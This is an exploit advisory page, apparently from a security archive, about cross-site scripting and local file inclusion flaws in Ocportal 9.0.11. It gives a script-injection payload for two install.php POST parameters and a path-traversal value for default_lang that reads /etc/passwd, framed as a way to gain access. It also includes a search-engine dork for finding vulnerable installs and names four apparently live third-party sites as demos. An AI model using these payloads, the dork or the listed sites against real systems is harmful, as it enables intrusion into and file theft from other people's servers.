Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion: Posted Mar 19, 2014; Authored by Hossein Hezami; Ocportal version 9.0.11 suffers from cross site scripting and local file inclusion vulnerabilities.; tags | exploit, local, vulnerability, xss, file inclusion; SHA-256 | faede0cb81d60b5fb5a2c35f3e6404feed4e7be0d91a5386bde2e9081d318e46; Download | Favorite | View

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

#######################################################################
#
# Exploit Title: 
# Ocportal 9.0.11 Cross site scripting
# Ocportal 9.0.11 Local File Inclusion
# Date: 2014 18 March
# Author: Dr.3v1l
# Vendor Homepage: http://ocportal.com
# Version : 9.0.11
# Tested on: Windows
# Category: webapps
# Google Dork: intext:"Powered by ocportal"
#
#######################################################################
#
# [+] Exploit (XSS) :
#
# http://<server>/ocportal/install.php
#
# URL encoded POST input parameters (forum_type , db_type) was set to :
# "><script>alert(/xss/)</script>
#
#######################################################################
#
# [+] Exploit (LFI) :
#
# http://<server>/ocportal/install.php
#
# Local File Inclusion , you can read /etc/passwd and exploit it to get acc
# method : POST
# the valun in install file : install.php
# set parameter : default_lang = ../../../../../../../../../../etc/passwd
#
#######################################################################
#
# [+] Demo :
#
# http://herspace.info
# http://visionsandashes.com
# http://stevejarvis.me
# http://magicomilan.net
#
#######################################################################
#
# [+] Contact Me :
#
#     B.Devils.B@gmail.com
#     Twitter.com/Doctor_3v1l
#     Facebook.com/bdb.0web
#     Facebook.com/groups/1427166220843499/
#     IR.linkedin.com/in/hossein3v1l
#     Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam
#######################################################################

Top Authors In Last 30 Days

Red Hat 233 files
Ubuntu 87 files
Gentoo 31 files
Debian 20 files
tmrswrr 9 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Jerry Thomas 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,081)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,414)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,315)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,668)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

Share This

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems